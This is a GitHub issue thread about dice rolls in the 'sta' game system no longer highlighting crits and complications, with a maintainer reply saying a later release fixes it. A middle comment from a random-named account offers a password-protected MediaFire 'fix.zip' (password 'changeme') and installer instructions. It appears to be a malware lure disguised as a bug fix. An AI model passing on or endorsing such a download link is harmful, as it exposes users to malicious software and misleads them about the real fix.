### ISSUE TITLE
crit/complication rolls no longer being highlited

### ISSUE THREAD

**Issue by cts359** [mkscho63/sta#138]
crits and complications no longer appear to be highlighted on die as of one of the recent updates (1.2.6 I believe.)  The issue appears to affect all types of rolls from sheets or the roller menu. I have spun up a new world with no additional modules to make sure it was not interference, and I noticed that same issue in a video of a different recorded game. 

![image](https://github.com/user-attachments/assets/d4467aa3-4ca4-4836-b26c-269a90c46f20)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tokeidlom** [comment]
This should now be working properly in the last release, if you can confirm?
